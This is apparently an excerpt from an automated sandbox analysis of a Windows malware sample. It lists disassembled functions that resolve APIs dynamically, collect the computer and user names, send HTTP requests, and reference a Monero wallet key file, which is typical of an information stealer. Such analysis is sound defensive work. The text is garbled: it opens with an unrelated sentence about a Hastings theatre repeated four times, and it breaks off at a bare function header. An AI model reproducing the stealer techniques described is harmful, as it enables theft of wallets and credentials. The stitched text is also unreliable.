Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: eb13b85ba5c52abd038b3cbd3395eb09971132151a52a293c81d63aa79ce3c4f
                                    • Instruction ID: 4e42a437e963440ed59526840bc00e574919bb5669f9dfdd565e00df866d714e
                                    • Opcode Fuzzy Hash: eb13b85ba5c52abd038b3cbd3395eb09971132151a52a293c81d63aa79ce3c4f
                                    • Instruction Fuzzy Hash: 024138687C360C7BCE28FBA4A85ED9D7763FF42716F405868FC009A280CBB0558C5D29
                                    Function 00C34880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 c34880-c34942 call c4a7a0 call c347b0 call c4a740 * 5 InternetOpenA StrCmpCA 816 c34944 801->816 817 c3494b-c3494f 801->817 816->817 818 c34955-c34acd call c48b60 call c4a920 call c4a8a0 call c4a800 * 2 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a920 call c4a8a0 call c4a800 * 2 InternetConnectA 817->818 819 c34ecb-c34ef3 InternetCloseHandle call c4aad0 call c39ac0 817->819 818->819 905 c34ad3-c34ad7 818->905 829 c34f32-c34fa2 call c48990 * 2 call c4a7a0 call c4a800 * 8 819->829 830 c34ef5-c34f2d call c4a820 call c4a9b0 call c4a8a0 call c4a800 819->830 830->829 906 c34ae5 905->906 907 c34ad9-c34ae3 905->907 908 c34aef-c34b22 HttpOpenRequestA 906->908 907->908 909 c34b28-c34e28 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a740 call c4a920 * 2 call c4a8a0 call c4a800 * 2 call c4aad0 lstrlen call c4aad0 * 2 lstrlen call c4aad0 HttpSendRequestA 908->909 910 c34ebe-c34ec5 InternetCloseHandle 908->910 1021 c34e32-c34e5c InternetReadFile 909->1021 910->819 1022 c34e67-c34eb9 InternetCloseHandle call c4a800 1021->1022 1023 c34e5e-c34e65 1021->1023 1022->910 1023->1022 1024 c34e69-c34ea7 call c4a9b0 call c4a8a0 call c4a800 1023->1024 1024->1021
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                      • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C34915
                                    • StrCmpCA.SHLWAPI(?,019DE580), ref: 00C3493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C34ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C50DDB,00000000,?,?,00000000,?,",00000000,?,019DE4D0), ref: 00C34DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C34E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C34E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C34E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00C34EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00C34EC5
                                    • HttpOpenRequestA.WININET(00000000,019DE520,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C34B15
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00C34ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: cd0b9fbbd40b0d4a9df14bb02664bf49e5cab4bfb4a62b20c006c51b682b1dcd
                                    • Instruction ID: 422e796f6253694162592d319c489ffa0b60509184ce27af1805af65e2b0661b
                                    • Opcode Fuzzy Hash: cd0b9fbbd40b0d4a9df14bb02664bf49e5cab4bfb4a62b20c006c51b682b1dcd
                                    • Instruction Fuzzy Hash: D412ED72950218AAEB15EB90DC92FEEB778FF54300F5041A9B50672091EF702F89DF66
                                    Function 00C478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: b8fc6050a05ddfacbd39295c479b285427aa6b25cb8e14374cf654fa9169c0ba
                                    • Instruction ID: 035164f214b34f763c814380577159b0e81387c7b31a79c211f50a29fc37ad4d
                                    • Opcode Fuzzy Hash: b8fc6050a05ddfacbd39295c479b285427aa6b25cb8e14374cf654fa9169c0ba
                                    • Instruction Fuzzy Hash: E101A9B1A04204EFD704DF95DD49BAEBBB8F744B11F104269F955F3380D37459448BA2
                                    Function 00C47850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: f37ab3fb3fe0f72e29707973ee45bed134290be008c6f19934a9397bdba227d6
                                    • Instruction ID: 9ce8ac900d02d2978bb934eb55fb7ecf49834642ff18445beec39de60eefcc94
                                    • Opcode Fuzzy Hash: f37ab3fb3fe0f72e29707973ee45bed134290be008c6f19934a9397bdba227d6
                                    • Instruction Fuzzy Hash: 9AF04FB1944208AFD714DF99DD4AFAEBBB8FB44711F10026AFA05A2680C77415448BA2
                                    Function 00C31160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 8bc4f901989d7842a381124e97f74fd39fb83aa62fe1b25d72a373bcce4185ad
                                    • Instruction ID: fa1f65954886638f3372c828b1a3f412262ef9978e05604369d9d6423aecacd3
                                    • Opcode Fuzzy Hash: 8bc4f901989d7842a381124e97f74fd39fb83aa62fe1b25d72a373bcce4185ad
                                    • Instruction Fuzzy Hash: BCD05E7490030CDFCB04DFE1D8496EDBB78FB48312F040565DD0972340EA3054C6CAA6
                                    Function 00C49C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 c49c10-c49c1a 634 c4a036-c4a0ca LoadLibraryA * 8 633->634 635 c49c20-c4a031 GetProcAddress * 43 633->635 636 c4a146-c4a14d 634->636 637 c4a0cc-c4a141 GetProcAddress * 5 634->637 635->634 638 c4a216-c4a21d 636->638 639 c4a153-c4a211 GetProcAddress * 8 636->639 637->636 640 c4a21f-c4a293 GetProcAddress * 5 638->640 641 c4a298-c4a29f 638->641 639->638 640->641 642 c4a2a5-c4a332 GetProcAddress * 6 641->642 643 c4a337-c4a33e 641->643 642->643 644 c4a344-c4a41a GetProcAddress * 9 643->644 645 c4a41f-c4a426 643->645 644->645 646 c4a4a2-c4a4a9 645->646 647 c4a428-c4a49d GetProcAddress * 5 645->647 648 c4a4dc-c4a4e3 646->648 649 c4a4ab-c4a4d7 GetProcAddress * 2 646->649 647->646 650 c4a515-c4a51c 648->650 651 c4a4e5-c4a510 GetProcAddress * 2 648->651 649->648 652 c4a612-c4a619 650->652 653 c4a522-c4a60d GetProcAddress * 10 650->653 651->650 654 c4a67d-c4a684 652->654 655 c4a61b-c4a678 GetProcAddress * 4 652->655 653->652 656 c4a686-c4a699 GetProcAddress 654->656 657 c4a69e-c4a6a5 654->657 655->654 656->657 658 c4a6a7-c4a703 GetProcAddress * 4 657->658 659 c4a708-c4a709 657->659 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,019C6980), ref: 00C49C2D
                                    • GetProcAddress.KERNEL32(75900000,019C69A0), ref: 00C49C45
                                    • GetProcAddress.KERNEL32(75900000,019D8E98), ref: 00C49C5E
                                    • GetProcAddress.KERNEL32(75900000,019D8C10), ref: 00C49C76
                                    • GetProcAddress.KERNEL32(75900000,019DCD80), ref: 00C49C8E
                                    • GetProcAddress.KERNEL32(75900000,019DCBE8), ref: 00C49CA7
                                    • GetProcAddress.KERNEL32(75900000,019CAFA0), ref: 00C49CBF
                                    • GetProcAddress.KERNEL32(75900000,019DCC18), ref: 00C49CD7
                                    • GetProcAddress.KERNEL32(75900000,019DCD50), ref: 00C49CF0
                                    • GetProcAddress.KERNEL32(75900000,019DCCD8), ref: 00C49D08
                                    • GetProcAddress.KERNEL32(75900000,019DCB28), ref: 00C49D20
                                    • GetProcAddress.KERNEL32(75900000,019C6780), ref: 00C49D39
                                    • GetProcAddress.KERNEL32(75900000,019C69C0), ref: 00C49D51
                                    • GetProcAddress.KERNEL32(75900000,019C6700), ref: 00C49D69
                                    • GetProcAddress.KERNEL32(75900000,019C6720), ref: 00C49D82
                                    • GetProcAddress.KERNEL32(75900000,019DCB58), ref: 00C49D9A
                                    • GetProcAddress.KERNEL32(75900000,019DCD38), ref: 00C49DB2
                                    • GetProcAddress.KERNEL32(75900000,019CAF28), ref: 00C49DCB
                                    • GetProcAddress.KERNEL32(75900000,019C67A0), ref: 00C49DE3
                                    • GetProcAddress.KERNEL32(75900000,019DCDC8), ref: 00C49DFB
                                    • GetProcAddress.KERNEL32(75900000,019DCDE0), ref: 00C49E14
                                    • GetProcAddress.KERNEL32(75900000,019DCD08), ref: 00C49E2C
                                    • GetProcAddress.KERNEL32(75900000,019DCDF8), ref: 00C49E44
                                    • GetProcAddress.KERNEL32(75900000,019C67C0), ref: 00C49E5D
                                    • GetProcAddress.KERNEL32(75900000,019DCD68), ref: 00C49E75
                                    • GetProcAddress.KERNEL32(75900000,019DCBD0), ref: 00C49E8D
                                    • GetProcAddress.KERNEL32(75900000,019DCCF0), ref: 00C49EA6
                                    • GetProcAddress.KERNEL32(75900000,019DCB10), ref: 00C49EBE
                                    • GetProcAddress.KERNEL32(75900000,019DCB70), ref: 00C49ED6
                                    • GetProcAddress.KERNEL32(75900000,019DCBA0), ref: 00C49EEF
                                    • GetProcAddress.KERNEL32(75900000,019DCD98), ref: 00C49F07
                                    • GetProcAddress.KERNEL32(75900000,019DCB88), ref: 00C49F1F
                                    • GetProcAddress.KERNEL32(75900000,019DCBB8), ref: 00C49F38
                                    • GetProcAddress.KERNEL32(75900000,019D9DB8), ref: 00C49F50
                                    • GetProcAddress.KERNEL32(75900000,019DCD20), ref: 00C49F68
                                    • GetProcAddress.KERNEL32(75900000,019DCB40), ref: 00C49F81
                                    • GetProcAddress.KERNEL32(75900000,019C68E0), ref: 00C49F99
                                    • GetProcAddress.KERNEL32(75900000,019DCDB0), ref: 00C49FB1
                                    • GetProcAddress.KERNEL32(75900000,019C6860), ref: 00C49FCA
                                    • GetProcAddress.KERNEL32(75900000,019DCC00), ref: 00C49FE2
                                    • GetProcAddress.KERNEL32(75900000,019DCC30), ref: 00C49FFA
                                    • GetProcAddress.KERNEL32(75900000,019C62C0), ref: 00C4A013
                                    • GetProcAddress.KERNEL32(75900000,019C6580), ref: 00C4A02B
                                    • LoadLibraryA.KERNEL32(019DCC48,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A03D
                                    • LoadLibraryA.KERNEL32(019DCC60,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A04E
                                    • LoadLibraryA.KERNEL32(019DCC78,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A060
                                    • LoadLibraryA.KERNEL32(019DCCC0,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A072
                                    • LoadLibraryA.KERNEL32(019DCC90,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A083
                                    • LoadLibraryA.KERNEL32(019DCCA8,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A095
                                    • LoadLibraryA.KERNEL32(019DCE28,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A0A7
                                    • LoadLibraryA.KERNEL32(019DCE88,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A0B8
                                    • GetProcAddress.KERNEL32(75FD0000,019C6400), ref: 00C4A0DA
                                    • GetProcAddress.KERNEL32(75FD0000,019DCE10), ref: 00C4A0F2
                                    • GetProcAddress.KERNEL32(75FD0000,019D8850), ref: 00C4A10A
                                    • GetProcAddress.KERNEL32(75FD0000,019DCF78), ref: 00C4A123
                                    • GetProcAddress.KERNEL32(75FD0000,019C6420), ref: 00C4A13B
                                    • GetProcAddress.KERNEL32(73B60000,019CB1A8), ref: 00C4A160
                                    • GetProcAddress.KERNEL32(73B60000,019C64A0), ref: 00C4A179
                                    • GetProcAddress.KERNEL32(73B60000,019CB130), ref: 00C4A191
                                    • GetProcAddress.KERNEL32(73B60000,019DCF00), ref: 00C4A1A9
                                    • GetProcAddress.KERNEL32(73B60000,019DCE40), ref: 00C4A1C2
                                    • GetProcAddress.KERNEL32(73B60000,019C6500), ref: 00C4A1DA
                                    • GetProcAddress.KERNEL32(73B60000,019C6640), ref: 00C4A1F2
                                    • GetProcAddress.KERNEL32(73B60000,019DCF90), ref: 00C4A20B
                                    • GetProcAddress.KERNEL32(763B0000,019C6340), ref: 00C4A22C
                                    • GetProcAddress.KERNEL32(763B0000,019C6300), ref: 00C4A244
                                    • GetProcAddress.KERNEL32(763B0000,019DCE58), ref: 00C4A25D
                                    • GetProcAddress.KERNEL32(763B0000,019DCE70), ref: 00C4A275
                                    • GetProcAddress.KERNEL32(763B0000,019C6440), ref: 00C4A28D
                                    • GetProcAddress.KERNEL32(750F0000,019CB1D0), ref: 00C4A2B3
                                    • GetProcAddress.KERNEL32(750F0000,019CAF50), ref: 00C4A2CB
                                    • GetProcAddress.KERNEL32(750F0000,019DCED0), ref: 00C4A2E3
                                    • GetProcAddress.KERNEL32(750F0000,019C62E0), ref: 00C4A2FC
                                    • GetProcAddress.KERNEL32(750F0000,019C6460), ref: 00C4A314
                                    • GetProcAddress.KERNEL32(750F0000,019CB1F8), ref: 00C4A32C
                                    • GetProcAddress.KERNEL32(75A50000,019DCEA0), ref: 00C4A352
                                    • GetProcAddress.KERNEL32(75A50000,019C65A0), ref: 00C4A36A
                                    • GetProcAddress.KERNEL32(75A50000,019D88A0), ref: 00C4A382
                                    • GetProcAddress.KERNEL32(75A50000,019DCEB8), ref: 00C4A39B
                                    • GetProcAddress.KERNEL32(75A50000,019DCEE8), ref: 00C4A3B3
                                    • GetProcAddress.KERNEL32(75A50000,019C63C0), ref: 00C4A3CB
                                    • GetProcAddress.KERNEL32(75A50000,019C6620), ref: 00C4A3E4
                                    • GetProcAddress.KERNEL32(75A50000,019DCF18), ref: 00C4A3FC
                                    • GetProcAddress.KERNEL32(75A50000,019DCF30), ref: 00C4A414
                                    • GetProcAddress.KERNEL32(75070000,019C6600), ref: 00C4A436
                                    • GetProcAddress.KERNEL32(75070000,019DCF48), ref: 00C4A44E
                                    • GetProcAddress.KERNEL32(75070000,019DCFC0), ref: 00C4A466
                                    • GetProcAddress.KERNEL32(75070000,019DCF60), ref: 00C4A47F
                                    • GetProcAddress.KERNEL32(75070000,019DCFA8), ref: 00C4A497
                                    • GetProcAddress.KERNEL32(74E50000,019C6480), ref: 00C4A4B8
                                    • GetProcAddress.KERNEL32(74E50000,019C64C0), ref: 00C4A4D1
                                    • GetProcAddress.KERNEL32(75320000,019C6520), ref: 00C4A4F2
                                    • GetProcAddress.KERNEL32(75320000,019DC870), ref: 00C4A50A
                                    • GetProcAddress.KERNEL32(6F060000,019C6660), ref: 00C4A530
                                    • GetProcAddress.KERNEL32(6F060000,019C6540), ref: 00C4A548
                                    • GetProcAddress.KERNEL32(6F060000,019C6360), ref: 00C4A560
                                    • GetProcAddress.KERNEL32(6F060000,019DCA38), ref: 00C4A579
                                    • GetProcAddress.KERNEL32(6F060000,019C63E0), ref: 00C4A591
                                    • GetProcAddress.KERNEL32(6F060000,019C6380), ref: 00C4A5A9
                                    • GetProcAddress.KERNEL32(6F060000,019C64E0), ref: 00C4A5C2
                                    • GetProcAddress.KERNEL32(6F060000,019C6560), ref: 00C4A5DA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00C4A5F1
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00C4A607
                                    • GetProcAddress.KERNEL32(74E00000,019DC930), ref: 00C4A629
                                    • GetProcAddress.KERNEL32(74E00000,019D8860), ref: 00C4A641
                                    • GetProcAddress.KERNEL32(74E00000,019DC8B8), ref: 00C4A659
                                    • GetProcAddress.KERNEL32(74E00000,019DCAC8), ref: 00C4A672
                                    • GetProcAddress.KERNEL32(74DF0000,019C6320), ref: 00C4A693
                                    • GetProcAddress.KERNEL32(6F9C0000,019DC858), ref: 00C4A6B4
                                    • GetProcAddress.KERNEL32(6F9C0000,019C63A0), ref: 00C4A6CD
                                    • GetProcAddress.KERNEL32(6F9C0000,019DC888), ref: 00C4A6E5
                                    • GetProcAddress.KERNEL32(6F9C0000,019DC960), ref: 00C4A6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: c3bd9a9a67b15c39f075053cc835c43c0d28ec1fd49f2dcc80478b9d0b3aca6e
                                    • Instruction ID: 191d0d4bae6f16a54aede8f015aa2c696e7153d6488983568b3224a9246f26f6
                                    • Opcode Fuzzy Hash: c3bd9a9a67b15c39f075053cc835c43c0d28ec1fd49f2dcc80478b9d0b3aca6e
                                    • Instruction Fuzzy Hash: 5E624AB5504201AFD348DFAAED8995E37F9F7C820171C853AE61DE3224D63998C9DB13
                                    Function 00C36280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
